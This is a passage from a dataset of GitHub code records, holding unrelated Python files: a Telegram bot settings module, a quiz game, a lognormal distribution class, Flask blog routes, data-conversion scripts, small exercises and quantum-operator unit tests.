conf['PORTFOLIOS']['TEST_ADM']\nSAC_PARKING = conf['PORTFOLIOS']['SAC_PARKING']\nSAC_BALANCED = conf['PORTFOLIOS']['SAC_BALANCED']\nSAC_GROWTH = conf['PORTFOLIOS']['SAC_GROWTH']\n\n# ============================== Charter ======================\nCHARTER_IMAGES_PATH = \"\" + PROJECT_HOME_DIR + \"/\" + conf['PATHS']['CHARTER_IMAGES_PATH']\nSTATS_PATH = \"\" + PROJECT_HOME_DIR + \"/\" + conf['PATHS']['STATS_PATH']\nTESTER_RESULT_PATH = \"\" + PROJECT_HOME_DIR + \"/\" + conf['PATHS']['TESTER_RESULT_PATH']\n# *************** Settings for candlestick chart\nIMAGE_WIDTH = conf['CHARTER_CANDLE_CHART']['IMAGE_WIDTH']\nIMAGE_HEIGHT = conf['CHARTER_CANDLE_CHART']['IMAGE_HEIGHT']\nTITLE_FONT_COLOR = conf['CHARTER_CANDLE_CHART']['TITLE_FONT_COLOR']\nEXTRA_DAYS = conf['CHARTER_CANDLE_CHART']['EXTRA_DAYS']\nAXIS_FONT_COLOR = conf['CHARTER_CANDLE_CHART']['AXIS_FONT_COLOR']\nCHART_BACKGROUND_COLOR = conf['CHARTER_CANDLE_CHART']['CHART_BACKGROUND_COLOR']\nOUTER_BACKGROUND_COLOR = conf['CHARTER_CANDLE_CHART']['OUTER_BACKGROUND_COLOR']\nGRID_LINE_COLOR = conf['CHARTER_CANDLE_CHART']['GRID_LINE_COLOR']\nWATERMARK_TEXT_COLOR = conf['CHARTER_CANDLE_CHART']['WATERMARK_TEXT_COLOR']\nCANDLE_UP_COLOR = conf['CHARTER_CANDLE_CHART']['CANDLE_UP_COLOR']\nCANDLE_DOWN_COLOR = conf['CHARTER_CANDLE_CHART']['CANDLE_DOWN_COLOR']\nCANDLE_SHADOW_COLOR = conf['CHARTER_CANDLE_CHART']['CANDLE_SHADOW_COLOR']\nCOMPARISON_LINE_COLOR = conf['CHARTER_CANDLE_CHART']['COMPARISON_LINE_COLOR']\n\n# *************** Settings for histogram chart\nH_IMAGE_WIDTH = conf['CHARTER_HISTOGRAM']['IMAGE_WIDTH']\nH_IMAGE_HEIGHT = conf['CHARTER_HISTOGRAM']['IMAGE_HEIGHT']\nH_AXIS_FONT_COLOR = conf['CHARTER_HISTOGRAM']['AXIS_FONT_COLOR']\nH_TITLE_FONT_COLOR = conf['CHARTER_HISTOGRAM']['TITLE_FONT_COLOR']\nH_WATERMARK_TEXT_COLOR = conf['CHARTER_HISTOGRAM']['WATERMARK_TEXT_COLOR']\nBAR_UP_COLOR = conf['CHARTER_HISTOGRAM']['BAR_UP_COLOR']\nBAR_DOWN_COLOR = conf['CHARTER_HISTOGRAM']['BAR_DOWN_COLOR']\nHIST_BACKGROUND_COLOR = conf['CHARTER_HISTOGRAM']['HIST_BACKGROUND_COLOR']\n\n# *************** Settings for pie chart\nP_IMAGE_WIDTH = conf['CHARTER_PIE']['IMAGE_WIDTH']\nP_IMAGE_HEIGHT = conf['CHARTER_PIE']['IMAGE_HEIGHT']\nP_BACKGROUND_COLOR = conf['CHARTER_PIE']['PIE_BACKGROUND_COLOR']\nP_TITLE_FONT_COLOR = conf['CHARTER_PIE']['TITLE_FONT_COLOR']\nP_OUTER_BACKGROUND_COLOR = conf['CHARTER_PIE']['OUTER_BACKGROUND_COLOR']\nP_AXIS_FONT_COLOR = conf['CHARTER_PIE']['AXIS_FONT_COLOR']\n\n# ============================== SQL Connect ======================\nif os.path.exists(conf_dir+'local.conf'):\n SQL_DB_NAME = conf['SQL_LOCAL']['DB_NAME']\n SQL_USER = conf['SQL_LOCAL']['DB_USER']\n SQL_PASSWORD = conf['SQL_LOCAL']['DB_PASSWORD']\nelse:\n SQL_DB_NAME = conf['SQL']['DB_NAME']\n SQL_USER = conf['SQL']['DB_USER']\n SQL_PASSWORD = conf['SQL']['DB_PASSWORD']\n\nSQL_URI = 'mysql+pymysql://{}:{}@localhost/{}'.format(SQL_USER, SQL_PASSWORD, SQL_DB_NAME)\n\nengine = create_engine(SQL_URI, pool_recycle=3600)\ncontainer = AlchemySessionContainer(engine=engine)\nalchemy_session = container.new_session('default')\n\n# ============================== Bot messages settings ======================\nEXCLUDE_USERS = conf['EXCLUDE_USERS']\nMSG_TABLE_NAME = conf['SQL_TABLE_NAMES']['MSG_TABLE_NAME']\nMAILING_DATA_TABLE_NAME = conf['SQL_TABLE_NAMES']['MAILING_DATA_TABLE_NAME']\nUSER_PROFILER_DATA_TABLE_NAME = conf['SQL_TABLE_NAMES']['USER_PROFILER_DATA_TABLE_NAME']\nUSER_PROFILER_MAP_TABLE_NAME = conf['SQL_TABLE_NAMES']['USER_PROFILER_MAP_TABLE_NAME']\nSIMPLE_MESSAGE_TYPE = conf['MESSAGES_TYPE']['SIMPLE_MESSAGE']\nPOLL_MESSAGE_TYPE = conf['MESSAGES_TYPE']['POLL_MESSAGE']\nUSER_POLL_MAP_TABLE_NAME = conf['SQL_TABLE_NAMES']['USER_POLL_MAP_TABLE_NAME']\n\n# ============================== BOT SETTINGS ======================\nPAYMENT_TOKEN = conf['TELEGRAM']['PAYMENT_TOKEN']\nCOMMAND_TOKEN = conf['TELEGRAM']['COMMAND_TOKEN']\nPAYMENT_SUCCESS_LISTEN = conf['TELEGRAM']['PAYMENT_SUCCESS_LISTEN']\nPAYMENT_SUCCESS_LISTEN_PORT = conf['TELEGRAM']['PAYMENT_SUCCESS_LISTEN_PORT']\n\nYAHOO_PATH = conf['PATHS']['YAHOO_PATH']\nTARIFF_IMAGES = conf['TELEGRAM']['TARIFF_IMAGES']\nBTC = conf['CREDENTIALS']['BTC']\nETH = conf['CREDENTIALS']['ETH']\nAPI_KEY = conf['TELEGRAM']['API_KEY']\nAPI_HASH = conf['TELEGRAM']['API_HASH']\nif os.path.exists(conf_dir+'local.conf'):\n UPSILON = conf['TELEGRAM']['UPSILON_LOCAL']\nelse:\n UPSILON = conf['TELEGRAM']['UPSILON']\nOWNER = conf['TELEGRAM']['OWNER']\nOWNER1 = conf['TELEGRAM']['OWNER1']\nOWNERS = conf['OWNERS']\nSERVICE_CHAT = conf['TELEGRAM']['SERVICE_CHAT']\n\nDONATE_DATA_TABLE_NAME = conf['SQL_TABLE_NAMES']['DONATE_DATA_TABLE_NAME']\nLAST_ACTION_TABLE_NAME = conf['SQL_TABLE_NAMES']['LAST_ACTION_TABLE_NAME']\nREQUEST_AMOUNT_TABLE_NAME = conf['SQL_TABLE_NAMES']['REQUEST_AMOUNT_TABLE_NAME']\nINCOMING_USERS_TABLE_NAME = conf['SQL_TABLE_NAMES']['INCOMING_USERS_TABLE_NAME']\nPAYMENT_HIST_TABLE_NAME = conf['SQL_TABLE_NAMES']['PAYMENT_HIST_TABLE_NAME']\n# ============================== Logging Setup ======================\n# logging.basicConfig(\n# filemode='w',\n# filename=os.path.abspath('logs/invest_services.log'),\n# format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s',\n# level=logging.WARNING)\n# logging.getLogger('scrapers').setLevel(level=logging.WARNING)\n\nRECURSION_DEPTH = 5\nUSER_PROFILER_QUESTION_AMOUNT = 13\n\nWARNING = conf['DEBUG_TYPE']['WARNING']\nERROR = conf['DEBUG_TYPE']['ERROR']\n\nDEBUG_LOG_FILE = None\n\n\ndef is_debug_init():\n global DEBUG_LOG_FILE\n if DEBUG_LOG_FILE is None:\n return False\n else:\n return True\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n\n def disable(self):\n self.HEADER = ''\n self.OKBLUE = ''\n self.OKGREEN = ''\n self.WARNING = ''\n self.FAIL = ''\n self.ENDC = ''\n\n\n# Print iterations progress\ndef print_progress_bar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='█', print_end=\"\"):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n print_end - Optional : end character (e.g. \"\\r\", \"\\r\\n\") (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filled_length = int(length * iteration // total)\n bar = fill * filled_length + '-' * (length - filled_length)\n print(f'\\r{prefix} |{bar}| {percent}% {suffix}', end=print_end)\n # Print New Line on Complete\n if iteration == total:\n print()\n\n\ndef debug_init(file_name=\"debug.log\"):\n # print(f'%% Inint log file: {file_name}')\n global DEBUG_LOG_FILE\n fname = f'{LOGS_PATH}{file_name}'\n bufsize = 1\n DEBUG_LOG_FILE = open(fname, \"a\", buffering=bufsize)\n\n\ndef debug_deinit():\n global DEBUG_LOG_FILE\n if DEBUG_LOG_FILE is not None:\n DEBUG_LOG_FILE.close()\n DEBUG_LOG_FILE = None\n\n\ndef debug(print_string=\"\", debug_type=\"NORMAL\", micro=False):\n caller_frame_record = inspect.stack()[1]\n frame = caller_frame_record[0]\n info = inspect.getframeinfo(frame)\n path, filename = os.path.split(info.filename)\n dt = datetime.datetime.now()\n time_format = ''\n if micro:\n time_format = \"%H:%M:%S.%f\"\n else:\n time_format = \"%H:%M:%S\"\n\n global DEBUG_LOG_FILE\n if DEBUG_LOG_FILE is not None:\n DEBUG_LOG_FILE.write(f'[{dt.strftime(time_format)}]{filename}:{info.lineno}:{print_string}\\n')\n else:\n if debug_type == \"NORMAL\":\n print(f'[{dt.strftime(time_format)}]{filename}:{info.lineno}:{print_string}')\n elif debug_type == \"WARNING\":\n print(f'{bcolors.WARNING}[{dt.strftime(time_format)}]{filename}:{info.lineno}:{print_string}{bcolors.ENDC}')\n elif debug_type == \"ERROR\":\n print(f'{bcolors.FAIL}[{dt.strftime(time_format)}]{filename}:{info.lineno}:{print_string}{bcolors.ENDC}')\n\n\ndef add_months(sourcedate, months):\n month = sourcedate.month - 1 + months\n year = sourcedate.year + month // 12\n month = month % 12 + 1\n day = min(sourcedate.day, calendar.monthrange(year, month)[1])\n return datetime.date(year, month, day)\n\n\ndef get_last_day_of_month(year, month):\n return calendar.monthrange(year, month)[1]\n\n\ndef add_watermark(before, after, font_size=16, wtermark_color=(217, 217, 217, 20)):\n img_to_edit = before\n image = Image.open(img_to_edit).convert(\"RGBA\")\n txt_img = Image.new(\"RGBA\", image.size, (255, 255, 255, 0))\n draw = ImageDraw.Draw(txt_img)\n font = ImageFont.truetype(\"arialbd.ttf\", font_size)\n # text = \"(c) @UpsilonBot\"\n text = \"@UpsilonBot\"\n font_width, font_height = font.getsize(text)\n x = image.width/2 - font_width/2\n y = image.height/2 - font_height/2\n draw.text((x, y), text, font=font, fill=wtermark_color)\n save_path = after\n composite = Image.alpha_composite(image, txt_img)\n composite.save(save_path)\n\n\ndef check_int(s):\n if s is None or s == \"\":\n return False\n if s[0] in ('-', '+'):\n return s[1:].isdigit()\n return s.isdigit()","repo_name":"wideGenesis/upsilon_one","sub_path":"project_shared.py","file_name":"project_shared.py","file_ext":"py","file_size_in_byte":12852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20821193189","text":"\"\"\"Game engine.\"\"\"\nimport prompt\n\nfrom brain_games.cli import ask_user_name, welcome_user\n\n\ndef run_game(rules, game):\n \"\"\"\n Run game engine.\n\n Parameters:\n rules: game rules, will be displayed to the user at the beginning.\n game: (question, answer) tuple.\n \"\"\"\n welcome_user()\n name = ask_user_name()\n print(rules)\n\n win_count = 0\n while win_count < 3:\n (question, answer) = game()\n print(f'Question: {question}')\n user_answer = prompt.string('Your answer: ')\n\n if user_answer == answer:\n print('Correct!')\n win_count += 1\n else:\n print(f'{user_answer} is wrong answer ;(. Correct answer was {answer}.') # noqa: E501\n print(f\"Let's try again, {name}!\")\n return\n print(f'Congratulations, {name}!')\n","repo_name":"alexander-lozovsky/python-project-lvl1","sub_path":"brain_games/run_game.py","file_name":"run_game.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2796347845","text":"\"\"\" @MvNormalDistribution\nModule defining a multivariate normal distribution with statistical procedures\n\"\"\"\n#from copy import deepcopy\nfrom numpy import empty, exp, float64, linspace, squeeze\nfrom numpy import log as nplog\n\nfrom ...base import utilities\nfrom .baseDistribution import baseDistribution\nfrom ..core import StatArray\nfrom .MvNormalDistribution import MvNormal\nfrom scipy.stats import multivariate_normal\n\nclass MvLogNormal(MvNormal):\n \"\"\"Class extension to geobipy.baseDistribution\n\n Handles a multivariate lognormal distribution. Uses Scipy to evaluate probabilities,\n but Numpy to generate random samples since scipy is slow.\n\n MvLogNormal(mean, variance, ndim, linearSpace, prng)\n\n Parameters\n ----------\n mean : scalar or array_like\n Mean(s) for each dimension\n variance : scalar or array_like\n Variance of the logged values for each dimension\n ndim : int, optional\n The number of dimensions in the multivariate normal.\n Only used if mean and variance are scalars that are constant for all dimensions\n linearSpace : bool, optional\n If False, any input and output is in log space.\n If True, input and output is in linear space.\n Inputs are internally logged, and the exponential of any output is returned\n prng : numpy.random.RandomState, optional\n A random state to generate random numbers. Required for parallel instantiation.\n\n Returns\n -------\n out : MvLogNormal\n Multivariate lognormal distribution.\n\n \"\"\"\n def __init__(self, mean, variance, ndim=None, linearSpace=False, prng=None):\n \"\"\" Initialize a multivariate lognormal distribution. \"\"\"\n if linearSpace:\n mean = nplog(mean)\n self.linearSpace = linearSpace\n super().__init__(mean, variance, ndim, prng=prng)\n\n @property\n def mean(self):\n return exp(self._mean) if self.linearSpace else self._mean\n\n @mean.setter\n def mean(self, values):\n self._mean[:] = nplog(values) if self.linearSpace else values\n\n def __deepcopy__(self, memo={}):\n \"\"\" Define a deepcopy routine \"\"\"\n if self._constant:\n return MvLogNormal(mean=self.mean[0], variance=self.variance[0, 0], ndim=self.ndim, linearSpace=self.linearSpace, prng=self.prng)\n else:\n return MvLogNormal(mean=self.mean, variance=self.variance, linearSpace=self.linearSpace, prng=self.prng)\n\n def derivative(self, x, order):\n if self.linearSpace:\n x = nplog(x)\n return super().derivative(x, order)\n\n def deviation(self, x):\n if self.linearSpace:\n x = nplog(x)\n return super().deviation(x)\n\n def rng(self, size = 1):\n return exp(super().rng(size)) if self.linearSpace else super().rng(size)\n\n def probability(self, x, log, axis=None, **kwargs):\n if self.linearSpace:\n x = nplog(x)\n\n return super().probability(x=x, log=log, axis=axis)\n\n def bins(self, nBins=99, nStd=4.0, axis=None, relative=False):\n \"\"\"Discretizes a range given the mean and variance of the distribution\n\n Parameters\n ----------\n nBins : int, optional\n Number of bins to return.\n nStd : float, optional\n The bin edges = mean +- nStd * variance.\n dim : int, optional\n Get the bins of this dimension, if None, returns bins for all dimensions.\n\n Returns\n -------\n bins : geobipy.StatArray\n The bin edges.\n\n \"\"\"\n # if not self.linearSpace:\n # return super().bins(nBins, nStd, axis)\n\n nStd = float64(nStd)\n nD = self.ndim\n if (nD > 1):\n if axis is None:\n bins = StatArray.StatArray(empty([nD, nBins+1]), name=utilities.getName(self.mean), units=utilities.getUnits(self.mean))\n for i in range(nD):\n tmp = squeeze(nStd * self.std[i, i])\n t = linspace(-tmp, tmp, nBins+1)\n if not relative:\n t += self._mean[i]\n bins[i, :] = t\n else:\n bins = empty(nBins+1)\n tmp = squeeze(nStd * self.std[axis, axis])\n t = linspace(-tmp, tmp, nBins+1)\n if not relative:\n t += self._mean[axis]\n bins[:] = t\n\n else:\n tmp = nStd * self.std\n bins = squeeze(linspace(-tmp, tmp, nBins+1))\n if not relative:\n bins += self._mean\n\n return (exp(bins)) if self.linearSpace else StatArray.StatArray(bins)\n\n @property\n def summary(self):\n msg = \"{}\\n\".format(type(self).__name__)\n if self.linearSpace:\n msg += ' Mean:log{}\\n'.format(self.mean)\n else:\n msg += ' Mean:{}\\n'.format(self.mean)\n msg += 'Variance:{}\\n'.format(self._variance)\n return msg","repo_name":"DOI-USGS/geobipy","sub_path":"geobipy/src/classes/statistics/MvLogNormalDistribution.py","file_name":"MvLogNormalDistribution.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"28715880398","text":"#\r\n# Created by Voronov Vadim\r\n#\r\n\r\n\r\nfrom flask import render_template, request, abort, redirect, url_for\r\n\r\nfrom app import app\r\nfrom app import post_services\r\nfrom app import images_services\r\n\r\nimport logging\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\"])\r\ndef home():\r\n try:\r\n posts = post_services.get_posts()\r\n return render_template(\"home.html\", posts=posts)\r\n except Exception as e:\r\n logging.exception(e)\r\n abort(500)\r\n\r\n\r\n@app.route(\"/create-post\", methods=[\"GET\", \"POST\"])\r\ndef create_post():\r\n try:\r\n if request.method == 'POST':\r\n title = request.form.get(\"title\")\r\n text = request.form.get(\"text\")\r\n image_filename = None\r\n if 'image' in request.files:\r\n image_filename = images_services.save(request.files['image'])\r\n if title and text:\r\n post_services.create_new_post(title, text, image_filename)\r\n else:\r\n abort(400)\r\n return render_template(\"create_post.html\")\r\n except Exception as e:\r\n logging.exception(e)\r\n abort(500)\r\n\r\n\r\n@app.route(\"/delete-post\", methods=[\"GET\"])\r\ndef delete_post():\r\n try:\r\n post_id = request.args.get(\"id\", type=int)\r\n if post_id is None:\r\n abort(400)\r\n post_services.try_delete(post_id)\r\n return redirect(url_for('home'))\r\n except Exception as e:\r\n logging.exception(e)\r\n abort(500)\r\n","repo_name":"Rright/new-blog","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72566534887","text":"#!/bin/python\n\nimport json\nimport sys\nimport time\nfrom datetime import datetime\nfrom collections import OrderedDict\n\n\ninput_file1 = sys.argv[1]\ninput_file2 = sys.argv[2]\ninput_file3 = sys.argv[3]\njson_file = sys.argv[4]\n\nif len(sys.argv) != 5:\n print(\"Usage: python3 convert_to_upb_format.py trn01crd.csv trn01rss.csv trn01tms.csv test.json\")\n sys.exit()\n\n# Using readlines()\ninput_rss = open(input_file2, 'r')\ninput_crd = open(input_file1, 'r')\ninput_tms = open(input_file3, 'r')\nrss_lines = input_rss.readlines()\ncrd_lines = input_crd.readlines()\ntms_lines = input_tms.readlines()\n\njson_content = {}\n\nc = 0 # collection number\nfor i in range(0, len(rss_lines), 6):\n# print(crd_lines[i].split(\",\")[2].rstrip(\"\\n\"))\n# print(str(crd_lines[i].split(\",\")[1]))\n wifi = {}\n for k in range(i, i+6,1):\n for j in range(0, len(rss_lines[k].split(',')), 1):\n if int(rss_lines[k].split(',')[j]) == 100:\n continue\n if \"AP\"+str(j) in wifi:\n if isinstance(wifi[\"AP\"+str(j)][\"rssi\"], str):\n wifi[\"AP\"+str(j)][\"rssi\"] = [int(rss_lines[k].split(',')[j])]\n if isinstance(wifi[\"AP\"+str(j)][\"rssi\"], int):\n wifi[\"AP\"+str(j)][\"rssi\"] = [rss_lines[k].split(',')[j]]\n if isinstance(wifi[\"AP\"+str(j)][\"rssi\"], list):\n a = int(rss_lines[k].split(',')[j])\n wifi[\"AP\"+str(j)][\"rssi\"].append(a)\n else:\n wifi[\"AP\"+str(j)] = {\"ssid\":\"?\", \"frequency\":\"?\", \"rssi\": [int(rss_lines[k].split(',')[j])]}\n\n ordWifi = sorted([int(x[2:]) for x in wifi.keys()])\n newWifi = OrderedDict()\n for key in ordWifi:\n newWifi[\"AP\"+str(key)] = wifi[\"AP\"+str(key)]\n\n\n fingerprints = []\n x = datetime(int(tms_lines[i][0:4]), int(tms_lines[i][4:6]), int(tms_lines[i][6:8]), \\\n int(tms_lines[i][8:10]), int(tms_lines[i][10:12]), int(tms_lines[i][12:14]))\n fingerprints.append({\"timestamp\": x.strftime('%d-%m-%Y %H:%M:%S'), \"wifi\": wifi, \"ble\": {}, \"gps\": [], \"telephony\": []})\n json_content[\"collection\"+str(c)] = {\"devId\":\"?\", \"devName\":\"?\", \"AndroidVersion\": \"?\",\\\n \"comment\": \"tau\", \"map\":\"tau\",\\\n \"x\":float(crd_lines[i].split(\",\")[0]),\\\n \"y\":float(crd_lines[i].split(\",\")[1]),\\\n \"z\":float(crd_lines[i].split(\",\")[2].rstrip(\"\\n\")),\n \"fingerprints\": fingerprints}\n c += 1\n\nwith open(json_file, 'w') as outfile:\n json.dump(json_content, outfile, indent=4)\n# json.dumps({int(x):json_content[x] for x in json_content}, outfile, indent = 4, sort_keys=True)\n","repo_name":"documenteinaer/similarity","sub_path":"convert_uji_to_upb_format.py","file_name":"convert_uji_to_upb_format.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16265966018","text":"import sys\n\ndef rememberer(thing):\n # open file\n file = open(\"database.txt\", \"a\")\n\n # write thing to file\n file.write(thing+\"\\n\")\n\n # close file\n file.close()\n\n# context manager pattern for dealing with files\ndef rememberer_with(thing):\n with open(\"database.txt\", \"a\") as file:\n file.write(thing+\"\\n\")\n\ndef show():\n # open file using a context manager\n with open(\"database.txt\") as file:\n # print out each line in file\n for line in file:\n print(line)\n\nif __name__ == '__main__':\n if sys.argv[1].lower() == \"--list\":\n show()\n else: \n # rememberer_with(input(\"What should I remember? > \"))\n rememberer_with(' '.join(sys.argv[1:]))\n","repo_name":"duliodenis/python_master_degree","sub_path":"unit_04/W2-File_IO/remember.py","file_name":"remember.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"39034760789","text":"#!/usr/bin/python3\n\"\"\"Fx to divide all objects of a matrix\"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\"Method to divide the objects\n Arguments: matrix, div.\n Raises: Errors depends on the case.\n Returns: objects divided\n \"\"\"\n err1 = \"matrix must be a matrix (list of lists) of integers/floats\"\n err2 = \"Each row of the matrix must have the same size\"\n err3 = \"div must be a number\"\n err4 = \"division by zero\"\n if len(matrix[0]) is 0:\n raise TypeError(err1)\n\n for row in matrix:\n if len(matrix[0]) != len(row):\n raise TypeError(err2)\n for obj in row:\n if type(obj) not in (int, float):\n raise TypeError(err1)\n\n if type(div) not in (int, float):\n raise TypeError(err3)\n\n if div is 0:\n raise ZeroDivisionError(err4)\n\n return [[round((obj / div), 2) for obj in row] for row in matrix]\n","repo_name":"acamilojuan/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3599544076","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFIBONACCI EM VETOR\n\"\"\"\n\ndef main():\n fibonacci = [0, 1]\n T = int(input())\n while T > 0:\n N = int(input())\n for i in range(N):\n item = fibonacci[-1] + fibonacci[-2]\n fibonacci.append(item)\n print('Fib(%d) = %d' %(N, fibonacci[N]))\n T -= 1\n\nif __name__ == '__main__':\n main()\n","repo_name":"sywrahg/URI","sub_path":"1176 - Fibonacci em Vetor.py","file_name":"1176 - Fibonacci em Vetor.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23665932638","text":"import unittest\nimport random\nimport numpy as np\nimport pyquil\nimport os\n\nfrom cirq import GridQubit, LineQubit, X, Y, Z, PauliSum, PauliString\nfrom openfermion import (\n QubitOperator,\n IsingOperator,\n FermionOperator,\n qubit_operator_sparse,\n get_interaction_operator,\n get_fermion_operator,\n jordan_wigner,\n get_sparse_operator,\n)\nfrom openfermion.hamiltonians import fermi_hubbard\nfrom openfermion.linalg import jw_get_ground_state_at_particle_number\n\nfrom ..circuit import Circuit, Gate, Qubit, build_uniform_param_grid\nfrom ..measurement import ExpectationValues\nfrom ..utils import RNDSEED, create_object, hf_rdm\nfrom ..interfaces.mock_objects import MockAnsatz\n\nfrom ._io import load_interaction_operator\n\nfrom ._utils import (\n generate_random_qubitop,\n get_qubitop_from_coeffs_and_labels,\n evaluate_qubit_operator,\n get_qubitop_from_matrix,\n reverse_qubit_order,\n get_expectation_value,\n change_operator_type,\n evaluate_operator_for_parameter_grid,\n get_fermion_number_operator,\n get_diagonal_component,\n get_polynomial_tensor,\n qubitop_to_paulisum,\n create_circuits_from_qubit_operator,\n evaluate_qubit_operator_list,\n get_ground_state_rdm_from_qubit_op,\n remove_inactive_orbitals,\n)\n\n\nclass TestQubitOperator(unittest.TestCase):\n def test_build_qubitoperator_from_coeffs_and_labels(self):\n # Given\n test_op = QubitOperator(((0, \"Y\"), (1, \"X\"), (2, \"Z\"), (4, \"X\")), 3.0j)\n coeffs = [3.0j]\n labels = [[2, 1, 3, 0, 1]]\n\n # When\n build_op = get_qubitop_from_coeffs_and_labels(coeffs, labels)\n\n # Then\n self.assertEqual(test_op, build_op)\n\n def test_qubitop_matrix_converion(self):\n # Given\n m = 4\n n = 2 ** m\n TOL = 10 ** -15\n random.seed(RNDSEED)\n A = np.array([[random.uniform(-1, 1) for x in range(n)] for y in range(n)])\n\n # When\n A_qubitop = get_qubitop_from_matrix(A)\n A_qubitop_matrix = np.array(qubit_operator_sparse(A_qubitop).todense())\n test_matrix = A_qubitop_matrix - A\n\n # Then\n for row in test_matrix:\n for elem in row:\n self.assertEqual(abs(elem) < TOL, True)\n\n def test_generate_random_qubitop(self):\n # Given\n nqubits = 4\n nterms = 5\n nlocality = 2\n max_coeff = 1.5\n fixed_coeff = False\n\n # When\n qubit_op = generate_random_qubitop(\n nqubits, nterms, nlocality, max_coeff, fixed_coeff\n )\n # Then\n self.assertEqual(len(qubit_op.terms), nterms)\n for term, coefficient in qubit_op.terms.items():\n for i in range(nlocality):\n self.assertLess(term[i][0], nqubits)\n self.assertEqual(len(term), nlocality)\n self.assertLessEqual(np.abs(coefficient), max_coeff)\n\n # Given\n fixed_coeff = True\n # When\n qubit_op = generate_random_qubitop(\n nqubits, nterms, nlocality, max_coeff, fixed_coeff\n )\n # Then\n self.assertEqual(len(qubit_op.terms), nterms)\n for term, coefficient in qubit_op.terms.items():\n self.assertEqual(np.abs(coefficient), max_coeff)\n\n def test_evaluate_qubit_operator(self):\n # Given\n qubit_op = QubitOperator(\"0.5 [] + 0.5 [Z1]\")\n expectation_values = ExpectationValues([0.5, 0.5])\n # When\n value_estimate = evaluate_qubit_operator(qubit_op, expectation_values)\n # Then\n self.assertAlmostEqual(value_estimate.value, 0.5)\n\n def test_evaluate_qubit_operator_list(self):\n # Given\n qubit_op_list = [\n QubitOperator(\"0.5 [] + 0.5 [Z1]\"),\n QubitOperator(\"0.3 [X1] + 0.2[Y2]\"),\n ]\n expectation_values = ExpectationValues([0.5, 0.5, 0.4, 0.6])\n # When\n value_estimate = evaluate_qubit_operator_list(qubit_op_list, expectation_values)\n # Then\n self.assertAlmostEqual(value_estimate.value, 0.74)\n\n def test_evaluate_operator_for_parameter_grid(self):\n # Given\n ansatz = MockAnsatz(4, 2)\n grid = build_uniform_param_grid(1, 2, 0, np.pi, np.pi / 10)\n backend = create_object(\n {\n \"module_name\": \"zquantum.core.interfaces.mock_objects\",\n \"function_name\": \"MockQuantumSimulator\",\n }\n )\n op = QubitOperator(\"0.5 [] + 0.5 [Z1]\")\n previous_layer_parameters = [1, 1]\n # When\n (\n parameter_grid_evaluation,\n optimal_parameters,\n ) = evaluate_operator_for_parameter_grid(\n ansatz, grid, backend, op, previous_layer_params=previous_layer_parameters\n )\n # Then (for brevity, only check first and last evaluations)\n self.assertIsInstance(parameter_grid_evaluation[0][\"value\"].value, float)\n self.assertEqual(parameter_grid_evaluation[0][\"parameter1\"], 0)\n self.assertEqual(parameter_grid_evaluation[0][\"parameter2\"], 0)\n self.assertIsInstance(parameter_grid_evaluation[99][\"value\"].value, float)\n self.assertEqual(\n parameter_grid_evaluation[99][\"parameter1\"], np.pi - np.pi / 10\n )\n self.assertEqual(\n parameter_grid_evaluation[99][\"parameter2\"], np.pi - np.pi / 10\n )\n\n self.assertEqual(len(optimal_parameters), 4)\n self.assertEqual(optimal_parameters[0], 1)\n self.assertEqual(optimal_parameters[1], 1)\n\n def test_reverse_qubit_order(self):\n # Given\n op1 = QubitOperator(\"[Z0 Z1]\")\n op2 = QubitOperator(\"[Z1 Z0]\")\n\n # When/Then\n self.assertEqual(op1, reverse_qubit_order(op2))\n\n # Given\n op1 = QubitOperator(\"Z0\")\n op2 = QubitOperator(\"Z1\")\n\n # When/Then\n self.assertEqual(op1, reverse_qubit_order(op2, n_qubits=2))\n self.assertEqual(op2, reverse_qubit_order(op1, n_qubits=2))\n\n def test_get_expectation_value(self):\n \"\"\"Check and for the state |100>\"\"\"\n # Given\n wf = pyquil.wavefunction.Wavefunction([0, 1, 0, 0, 0, 0, 0, 0])\n op1 = QubitOperator(\"Z0\")\n op2 = QubitOperator(\"Z1\")\n # When\n exp_op1 = get_expectation_value(op1, wf)\n exp_op2 = get_expectation_value(op2, wf)\n\n # Then\n self.assertAlmostEqual(-1, exp_op1)\n self.assertAlmostEqual(1, exp_op2)\n\n def test_change_operator_type(self):\n # Given\n operator1 = QubitOperator(\"Z0 Z1\", 4.5)\n operator2 = IsingOperator(\"Z0 Z1\", 4.5)\n operator3 = IsingOperator()\n operator4 = IsingOperator(\"Z0\", 0.5) + IsingOperator(\"Z1\", 2.5)\n # When\n 